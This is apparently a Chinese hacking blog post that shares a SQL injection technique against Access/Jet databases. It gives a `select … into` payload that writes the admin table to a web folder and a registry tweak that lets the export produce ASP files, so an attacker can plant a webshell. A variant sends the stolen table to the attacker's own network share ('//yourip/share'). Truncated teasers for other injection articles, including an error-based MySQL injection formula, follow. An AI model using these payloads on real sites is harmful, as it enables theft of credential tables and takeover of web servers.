已經聽n個人過說有人已經發現sql注入access得到webshell的技術了,也只是聽說而已,具體的細節還是不得而知。
最近在看的書中一章提到jet的安全,然後靈光一閃,呵呵,發現了一種可以利用access匯出asp的方法,分享之。
幾個月之前網上就流傳利用sql注入access匯出資料庫內容到文字檔案(可匯出txt、htm、html等格式)的方法:
select * into [test.txt] in 'd:/web/' 'text;' from admin
執行上述語句,在d:/web目錄下就會生成test.txt檔案,其內容就是表admin的內容。但是匯出asp格式就不行,會說「不能更新,資料庫或物件為唯讀」。
其實控制匯出檔案字尾是儲存在登錄檔的,具體鍵值是hkey_localmachine/software/microsoft/jet/4.0/engines/text/disableextension,預設情況下值為「!txt,csv,tab,asc,tmp,htm,html」,如果我們把asp也新增進去的話,呵呵,就可以匯出asp格式的檔案了。
這個方法跟那個呼叫access的shell函式執行命令一樣,要修改登錄檔,所以利用不是很大。
順便提一下,前面提到的匯出文字檔案的方法如果不知道web路徑貌似可以匯出到自己機器的哦:select * into [test.txt] in '//yourip/share' 'text;' from admin
SQL注入Access匯出WebShell 返回
目前有一種在access資料庫下匯出webshell的方法,這個方法是由lake2兄弟提出來的,下面就是我引用他這篇文章的原文 已經聽n個人過說有人已經發現sql注入access得到webshell的技術了,也只是聽說而已,具體的細節還是不得而知。最近在看的書中一章提到jet的安全,然後靈光一閃,呵...
注入攻擊之sql注入
在1998年,一位名為rfp的黑客發表了一篇題為 nt web technology vulnerabilities 的文章 注入攻擊的兩個條件 1 使用者能夠克制資料的輸入 在這裡,使用者能夠控制變數 2 原本要執行的 憑藉了使用者的輸入 一般輸入乙個 單引號就能引起執行查詢語句的語法錯誤,有些伺...
SQL注入之報錯注入
固定語句公式 union select 1 from select count concat floor rand 0 2 注入爆資料語句 a from information schema.tables group by a b 假如id輸入存在注入的話,可以通過如下語句進行報錯。mysql se...